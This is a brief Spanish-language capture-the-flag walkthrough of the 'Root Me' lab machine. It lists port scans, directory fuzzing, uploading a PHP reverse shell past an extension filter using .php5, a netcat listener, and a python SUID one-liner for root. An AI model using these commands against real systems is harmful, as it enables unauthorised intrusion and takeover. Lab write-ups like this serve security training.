Root Me

Scanning

sudo nmap -sS -p- --min-rate 5000 -vvv --open -n -Pn 10.10.241.191 -oG allports
nmap -sC -sV -p 22,80 10.10.241.191 -oN targeted
  

0818231123

80

Wfuzz

wfuzz -c --hc 404,403 -w /usr/share/wordlists/dirb/common.txt -t 100 -u 'http://10.10.241.191/FUZZ'
  

0818231117

http://10.10.241.191/panel/

0818231154

Subimos una reverse shell en php

locate shell.php
cp /usr/share/webshells/php/php-reverse-shell.php .
nano php-reverse-shell.php
  

0818231138

Modificamos la IP, el puerto y la shell colocamos bash

No nos permite subir archivos php así que probamos con algunas de las extensiones comunes php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, *.shtml, .htaccess. Funciona con php5

Así que nos ponemos en escucha en el puerto 4444 con netcat.

nc -lvp 4444

0818231157

Privilege Scalation

Buscamos archivos con SUID.

find / -perm -u=s 2>/dev/null
  

0818231110

Podemos usar python para escalar privilegios con el SUID

python -c 'import os; os.execl("/bin/bash", "bash", "-p")'

0818231146